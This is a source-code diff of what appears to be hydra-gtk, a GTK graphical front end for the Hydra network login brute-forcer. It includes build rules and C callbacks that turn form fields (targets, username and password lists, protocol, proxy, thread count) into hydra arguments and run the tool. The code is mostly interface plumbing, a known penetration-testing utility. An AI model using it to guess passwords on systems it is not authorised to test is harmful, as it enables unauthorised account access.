clean-binPROGRAMS:
-test -z "$(bin_PROGRAMS)" || rm -f $(bin_PROGRAMS)
distclean-binPROGRAMS:
maintainer-clean-binPROGRAMS:
install-binPROGRAMS: $(bin_PROGRAMS)
@$(NORMAL_INSTALL)
$(mkinstalldirs) $(DESTDIR)$(bindir)
@list='$(bin_PROGRAMS)'; for p in $$list; do \
if test -f $$p; then \
echo " $(INSTALL_PROGRAM) $$p $(DESTDIR)$(bindir)/`echo $$p|sed 's/$(EXEEXT)$$//'|sed '$(transform)'|sed 's/$$/$(EXEEXT)/'`"; \
$(INSTALL_PROGRAM) $$p $(DESTDIR)$(bindir)/`echo $$p|sed 's/$(EXEEXT)$$//'|sed '$(transform)'|sed 's/$$/$(EXEEXT)/'`; \
else :; fi; \
done
uninstall-binPROGRAMS:
@$(NORMAL_UNINSTALL)
list='$(bin_PROGRAMS)'; for p in $$list; do \
rm -f $(DESTDIR)$(bindir)/`echo $$p|sed 's/$(EXEEXT)$$//'|sed '$(transform)'|sed 's/$$/$(EXEEXT)/'`; \
done
.s.o:
$(COMPILE) -c $<
.S.o:
$(COMPILE) -c $<
mostlyclean-compile:
-rm -f *.o core *.core
clean-compile:
distclean-compile:
-rm -f *.tab.c
maintainer-clean-compile:
xhydra: $(xhydra_OBJECTS) $(xhydra_DEPENDENCIES)
@rm -f xhydra
$(LINK) $(xhydra_LDFLAGS) $(xhydra_OBJECTS) $(xhydra_LDADD) $(LIBS)
tags: TAGS
ID: $(HEADERS) $(SOURCES) $(LISP)
list='$(SOURCES) $(HEADERS)'; \
unique=`for i in $$list; do echo $$i; done | \
awk ' { files[$$0] = 1; } \
END { for (i in files) print i; }'`; \
here=`pwd` && cd $(srcdir) \
&& mkid -f$$here/ID $$unique $(LISP)
TAGS: $(HEADERS) $(SOURCES) $(TAGS_DEPENDENCIES) $(LISP)
tags=; \
here=`pwd`; \
list='$(SOURCES) $(HEADERS)'; \
unique=`for i in $$list; do echo $$i; done | \
awk ' { files[$$0] = 1; } \
END { for (i in files) print i; }'`; \
test -z "$(ETAGS_ARGS)$$unique$(LISP)$$tags" \
|| (cd $(srcdir) && etags $(ETAGS_ARGS) $$tags $$unique $(LISP) -o $$here/TAGS)
mostlyclean-tags:
clean-tags:
distclean-tags:
-rm -f TAGS ID
maintainer-clean-tags:
distdir = $(top_builddir)/$(PACKAGE)-$(VERSION)/$(subdir)
subdir = src
distdir: $(DISTFILES)
here=`cd $(top_builddir) && pwd`; \
top_distdir=`cd $(top_distdir) && pwd`; \
distdir=`cd $(distdir) && pwd`; \
cd $(top_srcdir) \
&& $(AUTOMAKE) --include-deps --build-dir=$$here --srcdir-name=$(top_srcdir) --output-dir=$$top_distdir --gnu src/Makefile
@for file in $(DISTFILES); do \
d=$(srcdir); \
if test -d $$d/$$file; then \
cp -pr $$d/$$file $(distdir)/$$file; \
else \
test -f $(distdir)/$$file \
|| ln $$d/$$file $(distdir)/$$file 2> /dev/null \
|| cp -p $$d/$$file $(distdir)/$$file || :; \
fi; \
done
DEPS_MAGIC := $(shell mkdir .deps > /dev/null 2>&1 || :)
-include $(DEP_FILES)
mostlyclean-depend:
clean-depend:
distclean-depend:
-rm -rf .deps
maintainer-clean-depend:
%.o: %.c
@echo '$(COMPILE) -c $<'; \
$(COMPILE) -Wp,-MD,.deps/$(*F).pp -c $<
@-cp .deps/$(*F).pp .deps/$(*F).P; \
tr ' ' '\012' < .deps/$(*F).pp \
| sed -e 's/^\\$$//' -e '/^$$/ d' -e '/:$$/ d' -e 's/$$/ :/' \
>> .deps/$(*F).P; \
rm .deps/$(*F).pp
%.lo: %.c
@echo '$(LTCOMPILE) -c $<'; \
$(LTCOMPILE) -Wp,-MD,.deps/$(*F).pp -c $<
@-sed -e 's/^\([^:]*\)\.o[ ]*:/\1.lo \1.o :/' \
< .deps/$(*F).pp > .deps/$(*F).P; \
tr ' ' '\012' < .deps/$(*F).pp \
| sed -e 's/^\\$$//' -e '/^$$/ d' -e '/:$$/ d' -e 's/$$/ :/' \
>> .deps/$(*F).P; \
rm -f .deps/$(*F).pp
info-am:
info: info-am
dvi-am:
dvi: dvi-am
check-am: all-am
check: check-am
installcheck-am:
installcheck: installcheck-am
install-exec-am: install-binPROGRAMS
install-exec: install-exec-am
install-data-am:
install-data: install-data-am
install-am: all-am
@$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am
install: install-am
uninstall-am: uninstall-binPROGRAMS
uninstall: uninstall-am
all-am: Makefile $(PROGRAMS)
all-redirect: all-am
install-strip:
$(MAKE) $(AM_MAKEFLAGS) AM_INSTALL_PROGRAM_FLAGS=-s install
installdirs:
$(mkinstalldirs) $(DESTDIR)$(bindir)
mostlyclean-generic:
clean-generic:
distclean-generic:
-rm -f Makefile $(CONFIG_CLEAN_FILES)
-rm -f config.cache config.log stamp-h stamp-h[0-9]*
maintainer-clean-generic:
mostlyclean-am: mostlyclean-binPROGRAMS mostlyclean-compile \
mostlyclean-tags mostlyclean-depend mostlyclean-generic
mostlyclean: mostlyclean-am
clean-am: clean-binPROGRAMS clean-compile clean-tags clean-depend \
clean-generic mostlyclean-am
clean: clean-am
distclean-am: distclean-binPROGRAMS distclean-compile distclean-tags \
distclean-depend distclean-generic clean-am
distclean: distclean-am
maintainer-clean-am: maintainer-clean-binPROGRAMS \
maintainer-clean-compile maintainer-clean-tags \
maintainer-clean-depend maintainer-clean-generic \
distclean-am
@echo "This command is intended for maintainers to use;"
@echo "it deletes files that may require special tools to rebuild."
maintainer-clean: maintainer-clean-am
.PHONY: mostlyclean-binPROGRAMS distclean-binPROGRAMS clean-binPROGRAMS \
maintainer-clean-binPROGRAMS uninstall-binPROGRAMS install-binPROGRAMS \
mostlyclean-compile distclean-compile clean-compile \
maintainer-clean-compile tags mostlyclean-tags distclean-tags \
clean-tags maintainer-clean-tags distdir mostlyclean-depend \
distclean-depend clean-depend maintainer-clean-depend info-am info \
dvi-am dvi check check-am installcheck-am installcheck install-exec-am \
install-exec install-data-am install-data install-am install \
uninstall-am uninstall all-redirect all-am all installdirs \
mostlyclean-generic distclean-generic clean-generic \
maintainer-clean-generic clean mostlyclean distclean maintainer-clean
# Tell versions [3.59,3.63) of GNU make to not export all variables.
# Otherwise a system limit (for SysV at least) may be exceeded.
.NOEXPORT:

682
hydra-gtk/src/callbacks.c Executable file
View file

@ -0,0 +1,682 @@
/*
* This file handles all that needs to be done...
* Some stuff is stolen from gcombust since I never used pipes... ok, i
* only used them in reallife :)
*/
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#include <gtk/gtk.h>
#include "callbacks.h"
#include "interface.h"
#include "support.h"
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
int hydra_pid = 0;
char port[10];
char tasks[10];
char timeout[10];
char smbparm[12];
char snmpparm[4];
char sapr3id[4];
char passLoginNull[4];
#define BUF_S 1024
void hydra_select_file(GtkEntry * widget, char *text) {
#ifdef GTK_TYPE_FILE_CHOOSER
GtkWidget *dialog;
char *filename;
dialog = gtk_file_chooser_dialog_new(text, (GtkWindow *) wndMain, GTK_FILE_CHOOSER_ACTION_OPEN,
GTK_STOCK_OPEN, GTK_RESPONSE_ACCEPT, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, NULL);
if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_ACCEPT) {
filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog));
gtk_entry_set_text(widget, filename);
g_free(filename);
}
gtk_widget_destroy(dialog);
#endif
}
int hydra_get_options(char *options[]) {
/* get the stuff from the gtk entries... */
int i = 1;
GtkWidget *widget;
GtkWidget *widget2;
int j;
gchar *tmp;
GString *a;
options[0] = HYDRA_BIN;
/* get the port */
widget = lookup_widget(GTK_WIDGET(wndMain), "spnPort");
j = gtk_spin_button_get_value_as_int((GtkSpinButton *) widget);
if (j != 0) {
snprintf(port, 10, "%d", j);
options[i++] = "-s";
options[i++] = port;
}
/* prefer ipv6 */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkIPV6");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-6";
}
/* use SSL? */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkSSL");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-S";
}
/* be verbose? */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkVerbose");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-v";
}
/* show attempts */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkAttempts");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-V";
}
/* debug mode? */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkDebug");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-d";
}
/* use colon separated list? */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkColon");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-C";
widget = lookup_widget(GTK_WIDGET(wndMain), "entColonFile");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else {
/* get the username, or username list */
widget = lookup_widget(GTK_WIDGET(wndMain), "radioUsername1");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-l";
widget = lookup_widget(GTK_WIDGET(wndMain), "entUsername");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else {
options[i++] = "-L";
widget = lookup_widget(GTK_WIDGET(wndMain), "entUsernameFile");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
}
/* get the pass, or pass list */
widget = lookup_widget(GTK_WIDGET(wndMain), "radioPass1");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-p";
widget = lookup_widget(GTK_WIDGET(wndMain), "entPass");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else {
options[i++] = "-P";
widget = lookup_widget(GTK_WIDGET(wndMain), "entPassFile");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
}
}
/* empty passes / login as pass? */
memset(passLoginNull, 0, 4);
widget = lookup_widget(GTK_WIDGET(wndMain), "chkPassNull");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
passLoginNull[0] = 'n';
}
widget = lookup_widget(GTK_WIDGET(wndMain), "chkPassLogin");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
if (passLoginNull[0] == 0) {
passLoginNull[0] = 's';
} else {
passLoginNull[1] = 's';
}
}
if (passLoginNull[0] != 0) {
options[i++] = "-e";
options[i++] = passLoginNull;
}
/* #of tasks */
widget = lookup_widget(GTK_WIDGET(wndMain), "spnTasks");
j = gtk_spin_button_get_value_as_int((GtkSpinButton *) widget);
if (j != 40) {
snprintf(tasks, 10, "%d", j);
options[i++] = "-t";
options[i++] = tasks;
}
/* timeout */
widget = lookup_widget(GTK_WIDGET(wndMain), "spnTimeout");
j = gtk_spin_button_get_value_as_int((GtkSpinButton *) widget);
if (j != 30) {
snprintf(timeout, 10, "%d", j);
options[i++] = "-w";
options[i++] = timeout;
}
/* loop around users? */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkUsernameLoop");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-u";
}
/* exit after first found pair? */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkExitf");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
options[i++] = "-f";
}
/* get additional parameters */
widget = lookup_widget(GTK_WIDGET(wndMain), "entProtocol");
tmp = (char *) gtk_entry_get_text((GtkEntry *) widget);
if (!strncmp(tmp, "http-proxy", 10)) {
widget = lookup_widget(GTK_WIDGET(wndMain), "entHTTPProxyURL");
options[i++] = "-m";
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else if (!strncmp(tmp, "http-", 5) || !strncmp(tmp, "https-", 6)) {
options[i++] = "-m";
widget = lookup_widget(GTK_WIDGET(wndMain), "entHTTPURL");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else if (!strcmp(tmp, "cisco-enable")) {
options[i++] = "-m";
widget = lookup_widget(GTK_WIDGET(wndMain), "entCiscoPass");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else if (!strcmp(tmp, "ldap3-crammd5")) {
options[i++] = "-m";
widget = lookup_widget(GTK_WIDGET(wndMain), "entLDAPDN");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else if (!strcmp(tmp, "ldap3-digestmd5")) {
options[i++] = "-m";
widget = lookup_widget(GTK_WIDGET(wndMain), "entLDAPDN");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else if (!strcmp(tmp, "smb")) {
memset(smbparm, 0, 12);
widget = lookup_widget(GTK_WIDGET(wndMain), "chkDomain");
widget2 = lookup_widget(GTK_WIDGET(wndMain), "chkLocal");
options[i++] = "-m";
strncpy(smbparm, "Both", sizeof(smbparm));
smbparm[strlen("Both")] = '\0';
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
strncpy(smbparm, "Domain", sizeof(smbparm));
smbparm[strlen("Domain")] = '\0';
}
if (gtk_toggle_button_get_active((GtkToggleButton *) widget2)) {
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
strncpy(smbparm, "Both", sizeof(smbparm));
smbparm[strlen("Both")] = '\0';
} else {
strncpy(smbparm, "Local", sizeof(smbparm));
smbparm[strlen("Local")] = '\0';
}
}
widget = lookup_widget(GTK_WIDGET(wndMain), "chkNTLM");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
strcat(smbparm, "Hash");
}
options[i++] = smbparm;
} else if (!strcmp(tmp, "sapr3")) {
widget = lookup_widget(GTK_WIDGET(wndMain), "spnSAPR3");
j = gtk_spin_button_get_value_as_int((GtkSpinButton *) widget);
snprintf(sapr3id, sizeof(sapr3id), "%d", j);
options[i++] = "-m";
options[i++] = sapr3id;
} else if (!strcmp(tmp, "cvs") || !strcmp(tmp, "svn")) {
widget = lookup_widget(GTK_WIDGET(wndMain), "entCVS");
options[i++] = "-m";
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else if (!strcmp(tmp, "snmp")) {
memset(snmpparm, 0, 4);
widget = lookup_widget(GTK_WIDGET(wndMain), "radioSNMPVer1");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
snmpparm[0] = '1';
} else {
snmpparm[0] = '2';
}
widget = lookup_widget(GTK_WIDGET(wndMain), "radioSNMPWrite");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
snmpparm[0] = 'w';
} else {
snmpparm[0] = 'r';
}
options[i++] = "-m";
options[i++] = snmpparm;
} else if (!strcmp(tmp, "telnet")) {
widget = lookup_widget(GTK_WIDGET(wndMain), "entTelnet");
if ((char *) gtk_entry_get_text((GtkEntry *) widget) != NULL) {
options[i++] = "-m";
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
}
}
/* clean up proxy settings */
unsetenv("HYDRA_PROXY_HTTP");
unsetenv("HYDRA_PROXY_CONNECT");
unsetenv("HYDRA_PROXY_AUTH");
/* proxy support */
widget = lookup_widget(GTK_WIDGET(wndMain), "radioProxy");
if (!gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
widget2 = lookup_widget(GTK_WIDGET(wndMain), "entHTTPProxy");
widget = lookup_widget(GTK_WIDGET(wndMain), "radioProxy2");
/* which variable do we set? */
if ((!strncmp(tmp, "http-", 5)) && (gtk_toggle_button_get_active((GtkToggleButton *) widget))) {
setenv("HYDRA_PROXY_HTTP", gtk_entry_get_text((GtkEntry *) widget2), 1);
} else {
setenv("HYDRA_PROXY_CONNECT", (char *) gtk_entry_get_text((GtkEntry *) widget2), 1);
}
/* do we need to provide user and pass? */
widget = lookup_widget(GTK_WIDGET(wndMain), "chkProxyAuth");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
widget = lookup_widget(GTK_WIDGET(wndMain), "entProxyUser");
widget2 = lookup_widget(GTK_WIDGET(wndMain), "entProxyPass");
a = g_string_new((gchar *) gtk_entry_get_text((GtkEntry *) widget));
a = g_string_append_c(a, ':');
a = g_string_append(a, gtk_entry_get_text((GtkEntry *) widget2));
setenv("HYDRA_PROXY_AUTH", a->str, 1);
(void) g_string_free(a, TRUE);
}
}
/* get the target, or target list */
widget = lookup_widget(GTK_WIDGET(wndMain), "radioTarget1");
if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) {
widget = lookup_widget(GTK_WIDGET(wndMain), "entTarget");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
} else {
options[i++] = "-M";
widget = lookup_widget(GTK_WIDGET(wndMain), "entTargetFile");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
}
/* get the service */
widget = lookup_widget(GTK_WIDGET(wndMain), "entProtocol");
options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget);
options[i] = NULL;
return i;
}
int update_statusbar() {
int i, j;
char *options[128];
guint context_id;
GtkStatusbar *statusbar;
extern guint message_id;
GString *statustext = g_string_new("hydra ");
i = hydra_get_options(options);
for (j = 1; j < i; j++) {
statustext = g_string_append(statustext, options[j]);
statustext = g_string_append_c(statustext, ' ');
}
statusbar = (GtkStatusbar *) lookup_widget(GTK_WIDGET(wndMain), "statusbar");
context_id = gtk_statusbar_get_context_id(statusbar, "status");
/* an old message in stack? */
if (message_id != 0) {
gtk_statusbar_remove(statusbar, context_id, message_id);
}
message_id = gtk_statusbar_push(statusbar, context_id, (gchar *) statustext->str);
(void) g_string_free(statustext, TRUE);
return TRUE;
}
int read_into(int fd) {
char in_buf[BUF_S];
char *passline;
char *start, *end;
int result;
GtkWidget *output;
GtkTextBuffer *outputbuf;
GtkTextIter outputiter;
if ((result = read(fd, in_buf, BUF_S - 1)) < 0) {
g_warning("%s::%i: read returned negative!", __FILE__, __LINE__);
return FALSE;
} else if (result == 0) {
return FALSE;
} else {
in_buf[result] = 0;
}
output = lookup_widget(GTK_WIDGET(wndMain), "txtOutput");
outputbuf = gtk_text_view_get_buffer((GtkTextView *) output);
gtk_text_buffer_get_iter_at_offset(outputbuf, &outputiter, -1);
if ((passline = strstr(in_buf, "password: ")) == NULL) {
gtk_text_buffer_insert(outputbuf, &outputiter, in_buf, result);
} else {
start = in_buf;
end = in_buf;
while ((end = (strchr(end + 1, '\n'))) < passline) {
start = end;
}
if (start != in_buf) {
gtk_text_buffer_insert(outputbuf, &outputiter, in_buf, (start - in_buf + 1));
}
gtk_text_buffer_insert_with_tags_by_name(outputbuf, &outputiter, start, (end - start + 1), "bold", NULL);
if (end - in_buf - result > 0) {
gtk_text_buffer_insert(outputbuf, &outputiter, end + 1, -1);
}
}
if (strstr(in_buf, " finished at ") != NULL) {
gtk_text_buffer_insert_with_tags_by_name(outputbuf, &outputiter, "<finished>\n\n", -1, "bold", NULL);
}
if (result == BUF_S - 1) /* there might be more available, recurse baby! */
return read_into(fd);
else
return TRUE;
}
/* wait for hydra output */
static int wait_hydra_output(gpointer data) {
static int stdout_ok = TRUE, stderr_ok = TRUE;
fd_set rset;
struct timeval tv;
int result, max;
int *fd = data;
int status;
g_assert((stdout_ok == TRUE) || (stderr_ok == TRUE));
tv.tv_sec = 0;
tv.tv_usec = 0;
FD_ZERO(&rset);
max = -1;
if (stdout_ok) {
FD_SET(fd[0], &rset);
max = fd[0];
}
if (stderr_ok) {
FD_SET(fd[1], &rset);
if (-1 == max)
max = fd[1];
else
max = fd[0] > fd[1] ? fd[0] : fd[1];
}
result = select(max + 1, &rset, NULL, NULL, &tv);
if (result < 0)
g_error("wait_hydra_output: select returned negative!");
else if (result == 0)
return TRUE;
if (stdout_ok && FD_ISSET(fd[0], &rset))
stdout_ok = read_into(fd[0]);
if (stderr_ok && FD_ISSET(fd[1], &rset))
stderr_ok = read_into(fd[1]);
if (!(stdout_ok || stderr_ok)) {
waitpid(hydra_pid, &status, 0);
hydra_pid = 0;
stdout_ok = stderr_ok = TRUE;
return FALSE;
} else
return TRUE;
}
/* assumes a successfull pipe() won't set the fd's to -1 */
static void close_pipe(int *pipe) {
if (-1 != pipe[0]) {
close(pipe[0]);
pipe[0] = -1;
}
if (-1 != pipe[1]) {
close(pipe[1]);
pipe[1] = -1;
}
}
/* executes the command stored in command->elemets (which is suitable for execv())
* returns an int *pfd with file descriptors:
* pfd[0] STDOUT output of the command and
* pfd[1] STDERR output of the command
*/
int *popen_re_unbuffered(char *command) {
static int p_r[2] = { -1, -1 }, p_e[2] = {
-1, -1};
static int *pfd = NULL;
char *options[128];
hydra_pid = 0;
update_statusbar();
/* only allocate once */
if (NULL == pfd)
pfd = malloc(sizeof(int) * 2);
/* clean up from last command */
close_pipe(p_r);
close_pipe(p_e);
if (pipe(p_r) < 0 || pipe(p_e) < 0) {
g_warning("popen_rw_unbuffered: Error creating pipe!");
return NULL;
}
if ((hydra_pid = fork()) < 0) {
g_warning("popen_rw_unbuffered: Error forking!");
return NULL;
} else if (hydra_pid == 0) { /* child */
int k;
if (setpgid(getpid(), getpid()) < 0)
g_warning("popen_rw_unbuffered: setpgid() failed");
if (close(p_r[0]) < 0)
g_warning("popen_rw_unbuffered: close(p_r[0]) failed");
if (p_r[1] != STDOUT_FILENO)
if (dup2(p_r[1], STDOUT_FILENO) < 0)
g_warning("popen_rw_unbuffered: child dup2 STDOUT failed!");
if (close(p_r[1]) < 0)
g_warning("popen_rw_unbuffered: close(p_r[1]) failed");
if (close(p_e[0]) < 0)
g_warning("popen_rw_unbuffered: close(p_e[0]) failed");
if (p_e[1] != STDERR_FILENO)
if (dup2(p_e[1], STDERR_FILENO) < 0)
g_warning("popen_rw_unbuffered: child dup2 STDERR failed!");
if (close(p_e[1]) < 0)
g_warning("popen_rw_unbuffered: close(p_e[1]) failed");
(void) hydra_get_options(options);
execv(HYDRA_BIN, options);
g_warning("%s %i: popen_rw_unbuffered: execv() returned", __FILE__, __LINE__);
for (k = 0; options[k] != NULL; k++) {
g_warning("%s", options[k]);
}
gtk_main_quit();
} else { /* parent */
if (close(p_r[1]) < 0)
g_warning("popen_rw_unbuffered: close(p_r[1]) (parent) failed");
if (close(p_e[1]) < 0)
g_warning("popen_rw_unbuffered: close(p_e[1]) (parent) failed");
pfd[0] = p_r[0];
pfd[1] = p_e[0];
return pfd;
}
g_assert_not_reached();
return pfd;
}
void on_quit1_activate(GtkMenuItem * menuitem, gpointer user_data) {
gtk_main_quit();
}
void on_about1_activate(GtkMenuItem * menuitem, gpointer user_data) {
}
void on_btnStart_clicked(GtkButton * button, gpointer user_data) {
int *fd = NULL;
fd = popen_re_unbuffered(NULL);
g_timeout_add(200, wait_hydra_output, fd);
}
void on_btnStop_clicked(GtkButton * button, gpointer user_data) {
if (hydra_pid != 0) {
kill(hydra_pid, SIGTERM);
hydra_pid = 0;
}
}
void on_wndMain_destroy(GtkObject * object, gpointer user_data) {
if (hydra_pid != 0) {
kill(hydra_pid, SIGTERM);
hydra_pid = 0;
}
gtk_main_quit();
}
gboolean on_entTargetFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data) {
hydra_select_file((GtkEntry *) widget, "Select target list");
gtk_widget_grab_focus(widget);
return TRUE;
}
gboolean on_entUsernameFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data) {
hydra_select_file((GtkEntry *) widget, "Select username list");
gtk_widget_grab_focus(widget);
return TRUE;
}
gboolean on_entPassFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data) {
hydra_select_file((GtkEntry *) widget, "Select password list");
gtk_widget_grab_focus(widget);
return TRUE;
}
gboolean on_entColonFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data) {
hydra_select_file((GtkEntry *) widget, "Select colon separated user,password list");
gtk_widget_grab_focus(widget);
return TRUE;
}
void on_btnSave_clicked(GtkButton * button, gpointer user_data) {
#ifdef GTK_TYPE_FILE_CHOOSER
GtkWidget *dialog;
char *filename;
gchar *text;
int fd;
GtkWidget *output;
GtkTextBuffer *outputbuf;
GtkTextIter start;
GtkTextIter end;
dialog = gtk_file_chooser_dialog_new("Save output", (GtkWindow *) wndMain, GTK_FILE_CHOOSER_ACTION_SAVE,
GTK_STOCK_SAVE, GTK_RESPONSE_ACCEPT, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, NULL);
if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_ACCEPT) {
filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog));
output = lookup_widget(GTK_WIDGET(wndMain), "txtOutput");
outputbuf = gtk_text_view_get_buffer((GtkTextView *) output);
gtk_text_buffer_get_start_iter(outputbuf, &start);
gtk_text_buffer_get_end_iter(outputbuf, &end);
text = gtk_text_buffer_get_text(outputbuf, &start, &end, TRUE);
fd = open(filename, O_CREAT | O_TRUNC | O_WRONLY, 0644);
if (fd > 0) {
write(fd, text, strlen(text));
close(fd);
}
g_free(text);
g_free(filename);
}
gtk_widget_destroy(dialog);
#endif
}
void on_chkColon_toggled(GtkToggleButton * togglebutton, gpointer user_data) {
GtkWidget *user, *pass;
user = lookup_widget(GTK_WIDGET(wndMain), "frmUsername");;
pass = lookup_widget(GTK_WIDGET(wndMain), "frmPass");
if (gtk_toggle_button_get_active(togglebutton)) {
gtk_widget_set_sensitive(user, FALSE);
gtk_widget_set_sensitive(pass, FALSE);
} else {
gtk_widget_set_sensitive(user, TRUE);
gtk_widget_set_sensitive(pass, TRUE);
}
}
void on_btnClear_clicked(GtkButton * button, gpointer user_data) {
GtkWidget *output;
GtkTextBuffer *outputbuf;
output = lookup_widget(GTK_WIDGET(wndMain), "txtOutput");
outputbuf = gtk_text_view_get_buffer((GtkTextView *) output);
gtk_text_buffer_set_text(outputbuf, "", -1);
}

27
hydra-gtk/src/callbacks.h Executable file
View file

@ -0,0 +1,27 @@
#include <gtk/gtk.h>
int update_statusbar();
void on_quit1_activate(GtkMenuItem * menuitem, gpointer user_data);
void on_about1_activate(GtkMenuItem * menuitem, gpointer user_data);
void on_btnStart_clicked(GtkButton * button, gpointer user_data);
void on_wndMain_destroy(GtkObject * object, gpointer user_data);
void on_btnStop_clicked(GtkButton * button, gpointer user_data);
gboolean on_entTargetFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data);
gboolean on_entUsernameFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data);
gboolean on_entPassFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data);
void on_btnSave_clicked(GtkButton * button, gpointer user_data);
gboolean on_entColonFile_button_press_event(GtkWidget * widget, GdkEventButton * event, gpointer user_data);
void on_chkColon_toggled(GtkToggleButton * togglebutton, gpointer user_data);
void on_btnClear_clicked(GtkButton * button, gpointer user_data);

1110
hydra-gtk/src/interface.c Executable file
View file

File diff suppressed because it is too large Load diff

6
hydra-gtk/src/interface.h Executable file
View file

@ -0,0 +1,6 @@
/*
* DO NOT EDIT THIS FILE - it is generated by Glade.
*/
GtkWidget *create_wndMain(void);

84
hydra-gtk/src/main.c Executable file
View file

@ -0,0 +1,84 @@
/*
* Initial main.c file generated by Glade. Edit as required.
* Glade will not overwrite this file.
*/
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#include <gtk/gtk.h>
#include <string.h>
#include "interface.h"
#include "support.h"
#include "callbacks.h"
char *hydra_path1 = "./hydra";
char *hydra_path2 = "/usr/local/bin/hydra";
char *hydra_path3 = "/usr/bin/hydra";
int main(int argc, char *argv[]) {
extern GtkWidget *wndMain;
int i;
extern guint message_id;
GtkWidget *output;
GtkTextBuffer *outputbuf;
gtk_set_locale();
gtk_init(&argc, &argv);
add_pixmap_directory(PACKAGE_DATA_DIR "/" PACKAGE "/pixmaps");
/* initialize the message id */
message_id = 0;
/* locate the hydra binary */
HYDRA_BIN = NULL;
for (i = 0; i < argc - 1; i++) {
if (!strcmp(argv[i], "--hydra-path")) {
HYDRA_BIN = argv[i + 1];
break;
}
}
if ((HYDRA_BIN != NULL) && (g_file_test(HYDRA_BIN, G_FILE_TEST_IS_EXECUTABLE))) {
/* just for obfuscation *g* */
} else if (g_file_test(hydra_path1, G_FILE_TEST_IS_EXECUTABLE)) {
HYDRA_BIN = hydra_path1;
} else if (g_file_test(hydra_path2, G_FILE_TEST_IS_EXECUTABLE)) {
HYDRA_BIN = hydra_path2;
} else if (g_file_test(hydra_path3, G_FILE_TEST_IS_EXECUTABLE)) {
HYDRA_BIN = hydra_path3;
} else {
g_error("Please tell me where hydra is, use --hydra-path\n");
return -1;
}
/* create window and show it */
wndMain = create_wndMain();
gtk_widget_show(wndMain);
/* if we cant use the new cool file chooser, the save button gets disabled */
#ifndef GTK_TYPE_FILE_CHOOSER
GtkWidget *btnSave;
btnSave = lookup_widget(GTK_WIDGET(wndMain), "btnSave");
gtk_widget_set_sensitive(btnSave, FALSE);
#endif
/* update the statusbar every now and then */
g_timeout_add(600, update_statusbar, NULL);
/* we want bold text in the output window */
output = lookup_widget(GTK_WIDGET(wndMain), "txtOutput");
outputbuf = gtk_text_view_get_buffer((GtkTextView *) output);
gtk_text_buffer_create_tag(outputbuf, "bold", "weight", PANGO_WEIGHT_BOLD, NULL);
/* he ho, lets go! */
gtk_main();
return 0;
}

120
hydra-gtk/src/support.c Executable file
View file

@ -0,0 +1,120 @@
/*
* DO NOT EDIT THIS FILE - it is generated by Glade.
*/
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#include <sys/types.h>
